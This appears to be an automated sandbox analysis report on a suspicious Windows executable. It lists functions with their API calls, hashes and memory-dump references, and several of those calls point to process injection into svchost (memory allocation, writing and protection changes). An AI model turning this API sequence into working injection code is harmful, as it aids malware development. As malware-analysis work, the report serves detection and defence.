
Yara matches

Similarity

API ID: MemoryProcess$AllocFreeHeapReadVirtualWrite
String ID: @
API String ID: 3931978661-2766056989
Opcode ID: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
Instruction ID: 49d5038374c617281847cfa8613ef8dafcb7c1c33cb977380acacb8086e307ba
Opcode Fuzzy Hash: ccd70a0ca5a4c560fc92debafb302037228b4baa55aaef678cfa11071513d053
Instruction Fuzzy Hash: 97A12676205BC085EB629B27E4507EE67A0F788BC4F088425EF8D5BB69EF39C555CB00

Function 00000001400043F0 Relevance: 5.5, APIs: 4, Instructions: 469memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000BD60: GetModuleFileNameW.KERNEL32 ref: 000000014000BDAF
Part of subcall function 000000014000BD60: LoadLibraryA.KERNEL32 ref: 000000014000BDF2
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE14
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE43
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE72
Part of subcall function 000000014000BD60: GetProcAddress.KERNEL32 ref: 000000014000BE9D
Part of subcall function 000000014000BD60: GetProcessHeap.KERNEL32 ref: 000000014000BEAF
Part of subcall function 000000014000BD60: RtlReAllocateHeap.NTDLL ref: 000000014000BECA

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

HeapFree.KERNEL32 ref: 00000001400045C1
HeapFree.KERNEL32(00000000,00000000,?,000000014000326D), ref: 0000000140004842
HeapFree.KERNEL32 ref: 0000000140004AD6
memcpy.MSVCRT ref: 0000000140004B09

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$Free$AllocateFileLibraryLoadModuleNameProcessmemcpymemset
String ID:
API String ID: 140709066-0
Opcode ID: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
Instruction ID: efac56c58761c5b53cd2b935686c719a5323fa47eacfc037fad2ad30534b96ad
Opcode Fuzzy Hash: 2d1c915d3e61f1fb7c3c85f5494a43be86836c671b25dc83c622586cc8eb53fa
Instruction Fuzzy Hash: DD228FB5700B8585EB62DF22E8503EA23A0F789BD8F448166EB5D477B6DF38C909C744

Function 0000000140008BF0 Relevance: 5.4, APIs: 4, Instructions: 359memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00000001400090D9
HeapFree.KERNEL32 ref: 00000001400090F3
HeapFree.KERNEL32 ref: 000000014000910D
HeapFree.KERNEL32 ref: 0000000140009127

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memset
String ID:
API String ID: 631287834-0
Opcode ID: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
Instruction ID: 0399d008ca01f3e7ae8c4d26418939d543f2c779a5219281a3e46e336b9b5677
Opcode Fuzzy Hash: 5f052656b4539390a674b9cd562996d9c182f8e0918825306dd2bf5ae976865b
Instruction Fuzzy Hash: 53E1C0B660468281EB62DB23F4407EB67A1F798BC8F544026FF8947BA9DB39C941C740

Function 0000000140013B50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32 ref: 0000000140013BB8
VirtualFreeEx.KERNEL32 ref: 0000000140013BE5

Strings

@, xrefs: 0000000140013B7C

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeMemoryProcessVirtualWrite
String ID: @
API String ID: 2227173347-2766056989
Opcode ID: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
Instruction ID: 55d91dff6a088f6984b8b652fa138d81b5292368ccde077922b963bfd0e4f872
Opcode Fuzzy Hash: 9a413e4547a8f19bf2b71c811f9e043220cfa0b658f72ae18e561b0f4f9a5e0c
Instruction Fuzzy Hash: 47113536308B9081EB618B07A85479AA7A4F78CFD0F488025EF8C87B69EF39C145CB00

Function 0000000140009430 Relevance: 5.2, APIs: 4, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
Instruction ID: abf0167f26eaa8b1341e4727f4fb40882108a042724cd5bbc7dba3d4017e7680
Opcode Fuzzy Hash: ef001dc6a8a34588974efeeab15473d05159a0728a0990e54c085eaf818c73d9
Instruction Fuzzy Hash: 47A16EB6215A8085EB62CF27E8447EE67A1F788BC8F14402AEF4D477A9EF39C545C740

Function 0000000140003ED0 Relevance: 5.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000CAF0: HeapFree.KERNEL32(?,?,00000000,000000014000DD66), ref: 000000014000CBAA

HeapFree.KERNEL32 ref: 00000001400040A0
HeapFree.KERNEL32 ref: 00000001400040C2
HeapFree.KERNEL32 ref: 00000001400040E4
HeapFree.KERNEL32 ref: 0000000140004106

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
Instruction ID: f58b36fc4f80b02d6db5818868401dd8c31dbbb25ea06bc06c998337cc310218
Opcode Fuzzy Hash: b108f9f4a893c3e12e67817eb476791b24ba81c44ca3d0697336e7036c249844
Instruction Fuzzy Hash: B951C3B5701B8281EB63CB13B4147EB22A5FB89BC8F188024FF4D57BA6DE39C9059744

Function 00000001400169F0 Relevance: 5.1, APIs: 4, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0000000140016AAF
memcpy.MSVCRT ref: 0000000140016AC4
HeapFree.KERNEL32 ref: 0000000140016B2C
HeapFree.KERNEL32 ref: 0000000140016B6A

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeapmemcpy
String ID:
API String ID: 673829100-0
Opcode ID: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
Instruction ID: c92d060d941fca04b38797fdd340357e26ec207b449130a56d7bb1cc0a947dbe
Opcode Fuzzy Hash: 72da0d61fca60a9855a74ed57a38a50fbf2db88a5ba32426b899817a34a2c748
Instruction Fuzzy Hash: 73418E35600B8181EB129B2398503EA62A1FB8CBD8F94C119EF5E5B7B5DF3ACD85C740

Function 0000000140002660 Relevance: 5.1, APIs: 4, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140007230: HeapFree.KERNEL32 ref: 0000000140007308
Part of subcall function 0000000140007230: HeapFree.KERNEL32 ref: 000000014000731D

memcpy.MSVCRT ref: 0000000140002786
HeapFree.KERNEL32 ref: 00000001400027B7
HeapFree.KERNEL32 ref: 00000001400027D1
HeapFree.KERNEL32 ref: 00000001400027EB

Part of subcall function 0000000140007340: memcpy.MSVCRT ref: 0000000140007475

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
Instruction ID: b21d00c09a7a7cebf341c700073de6dca50953cd70a54a6fcbc8b966eb336d55
Opcode Fuzzy Hash: e115f566d86e52d7b676b8586eccf910824452cc7cf57d3d669636780f8eff8e
Instruction Fuzzy Hash: D7416C76204B8586EB66CF27E8007DA77A4F788BD4F488016AF4C477A9DF38C945CB40

Analysis Process: 44qxnhoiecq.exePID: 7308, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	27.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 10001FF0 Relevance: 42.7, APIs: 22, Strings: 2, Instructions: 704nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10002058
NtAllocateVirtualMemory.NTDLL ref: 100020C2
NtAllocateVirtualMemory.NTDLL ref: 10002144
NtWriteVirtualMemory.NTDLL ref: 100021AC
NtProtectVirtualMemory.NTDLL ref: 10002219
NtAllocateVirtualMemory.NTDLL ref: 100022BF
NtAllocateVirtualMemory.NTDLL ref: 10002307
NtFreeVirtualMemory.NTDLL ref: 1000236D

Strings

@, xrefs: 100022F3
0, xrefs: 1000296B

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$Allocate$FreeProtectWrite
String ID: 0$@
API String ID: 2341880195-1545510068
Opcode ID: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
Instruction ID: 8a67cd01151eb9b4bc0707442a35890dfe94f4f8c30553d2cc09ea552f4a7a1d
Opcode Fuzzy Hash: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
Instruction Fuzzy Hash: 1052B976210B9186EB21CF26E89478E37A5FB48BD8F414216EE8D87B5CDF38C695C740

Function 10001AE0 Relevance: 22.7, APIs: 15, Instructions: 226nativeCOMMON

Download Yara Rule

APIs

NtCreateEvent.NTDLL ref: 10001B29
NtCreateEvent.NTDLL ref: 10001B5A
NtClose.NTDLL ref: 10001D92
NtClose.NTDLL ref: 10001D9C
NtDuplicateObject.NTDLL ref: 10001DC9
NtDuplicateObject.NTDLL ref: 10001DFA
NtFreeVirtualMemory.NTDLL ref: 10001E23
NtFreeVirtualMemory.NTDLL ref: 10001E48

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: CloseCreateDuplicateEventFreeMemoryObjectVirtual
String ID:
API String ID: 2195376797-0
Opcode ID: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
Instruction ID: ec56d51781d27893633d9c7240a3277deb896bb74b027171511855976fde94cd
Opcode Fuzzy Hash: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
Instruction Fuzzy Hash: 5BA14476314B5086E721CF65E89078E33B5FB48BD9F404216EE8D87A58EF79D0A9C780

Function 10003220 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 143nativememoryCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 10003264
NtAllocateVirtualMemory.NTDLL ref: 100032C6

Strings

H, xrefs: 1000338A
@, xrefs: 100032AF

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$AllocateRead
String ID: @$H
API String ID: 3289415595-104103126
Opcode ID: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
Instruction ID: dea1a02c564d3dd13500935e78af13ab2823ce8030b56d528f9cdc6a1a59fef7
Opcode Fuzzy Hash: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
Instruction Fuzzy Hash: E3515672701B818AEB61CF65E480B8E73B9FB48BD8F508116EE9D57A58DF38C15AC740

Function 10003470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 100034A2
NtWriteVirtualMemory.NTDLL ref: 10003534
NtClearEvent.NTDLL ref: 10003554
NtSignalAndWaitForSingleObject.NTDLL ref: 10003568
NtReadVirtualMemory.NTDLL ref: 1000359A

Strings

H, xrefs: 100035AB
H, xrefs: 100034C9
H, xrefs: 10003545

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$Read$ClearEventObjectSignalSingleWaitWrite
String ID: H$H$H
API String ID: 295313806-1989617792
Opcode ID: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
Instruction ID: 5021ed8a1ce9b19b5c1717e875882b8ce5ca7f80513f570afed245be05e02f97
Opcode Fuzzy Hash: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
Instruction Fuzzy Hash: 3E310A76315B8196EB628F25E94078A73A4F7887D5F405125DF8D83B18EF39C5A9CB00

Function 10002F60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10002FCF
NtAllocateVirtualMemory.NTDLL ref: 1000304E
NtReadVirtualMemory.NTDLL ref: 1000319D
NtFreeVirtualMemory.NTDLL ref: 100031ED

Strings

@, xrefs: 1000302B

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$Allocate$FreeRead
String ID: @
API String ID: 1625299726-2766056989
Opcode ID: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
Instruction ID: 08cac392a7a719ba5502d424389b33665d87b9a1454d0d325e88c27c51f30f16
Opcode Fuzzy Hash: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
Instruction Fuzzy Hash: 1E713776705A809AE712CF61E8507DE77B9F748BCCF008426EE8A97A18DF39C159C740

Function 10002CB0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151memorynativeCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 10002CF3
NtAllocateVirtualMemory.NTDLL ref: 10002D8F

Strings

@, xrefs: 10002D4F

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: AllocateByteCharMemoryMultiVirtualWide
String ID: @
API String ID: 2538853753-2766056989
Opcode ID: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
Instruction ID: 616015141f86b4411b04d895360121dff96872f804a9fadd55d9b66df03b3043
Opcode Fuzzy Hash: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
Instruction Fuzzy Hash: 1E610776204B8186E721DF21E89039E77B8F7887D8F504126EE8D87A2CDF79C599CB00

Function 100015F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 1000160F
NtReadVirtualMemory.NTDLL ref: 10001644
NtReadVirtualMemory.NTDLL ref: 100016AB
NtReadVirtualMemory.NTDLL ref: 100016F1

Strings

@, xrefs: 100016B5

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryReadVirtual$InformationProcessQuery
String ID: @
API String ID: 2292840443-2766056989
Opcode ID: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
Instruction ID: 13bcebea3263881b6e9f5070fea06d859024c12457ffc486f15f1268fdda5df8
Opcode Fuzzy Hash: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
Instruction Fuzzy Hash: 9B31D7B2618BD191E7B19B15F8447CEB368F788BC9F854125DB8943A48DF3DC186CB04

Function 006C007E Relevance: 7.6, APIs: 5, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006C05BD: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,006C0093), ref: 006C05CA

VirtualProtect.KERNELBASE(?,?,00000004,?,?), ref: 006C00B3
VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000004,?,?), ref: 006C00C3
VirtualProtect.KERNELBASE(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 006C010C
VirtualProtect.KERNELBASE(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 006C0122
VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 006C0187

Memory Dump Source

Source File: 00000007.00000002.2462716197.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0000_44qxnhoiecq.jbxd

Similarity

API ID: Virtual$Protect$AllocFree
String ID:
API String ID: 3729553426-0
Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction ID: 75d7c6bc5f97679bdffee2139a64472b8f009ced8ff5ad679ec0e1cd10ae7a69
Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
Instruction Fuzzy Hash: 20419D72200114EFEB54AF64C885FBAB7AAEF88724B25451DF9059B712C771EC02CAA4

Function 10001920 Relevance: 4.6, APIs: 3, Instructions: 66nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10001958
NtWriteVirtualMemory.NTDLL ref: 100019AF
NtFreeVirtualMemory.NTDLL ref: 100019F2

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$AllocateFreeWrite
String ID:
API String ID: 2213553877-0
Opcode ID: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
Instruction ID: 4be20192d114f57ed866d6a02c79e9e60545017e345fbc303b6d3b3f1d5ba602
Opcode Fuzzy Hash: 99ed4c72808152846b4c4dc95cb12d5b80bf151d319c17aa8236581e06b6da23
Instruction Fuzzy Hash: 3A213872705B8082EB11CF65E85478A77A8F789BD5F584029DF8C87B68DF39C58ACB40

Function 10001A20 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
Instruction ID: bc3fb0688c431488aa2819edea9e73b974ef83373d57799a2a78b4a70b7274a1
Opcode Fuzzy Hash: d10ebd9e48d5dcbf352534e80ccc9bc8cebbc059bbcb083b2fa9c46e13604436
Instruction Fuzzy Hash: D5117026304F8182EB11DB24E89139E23A0FB997D4F100024FE8D8736DEF6CC999C750

Function 100017D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 100017EE

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
Instruction ID: 85a4ee6809ba2549589f64f9e1a2927fba021b9ffec7882c337938f7ba2d8dd0
Opcode Fuzzy Hash: d850f230c99a5425dd30eee36a9840c513874e73cb9285ce0d5e71e6250e9977
Instruction Fuzzy Hash: 7BE03072714B8086D7408F1AF58064AB3A8F7887C4F848135FB9D83B18EF78C5A5CB04

Function 10001830 Relevance: 1.5, APIs: 1, Instructions: 20memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 10001858

Memory Dump Source

Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: dceb824580b96e71b405478d58ecacf46d89fa57c2bddcfa4af7ef3f192c92e1
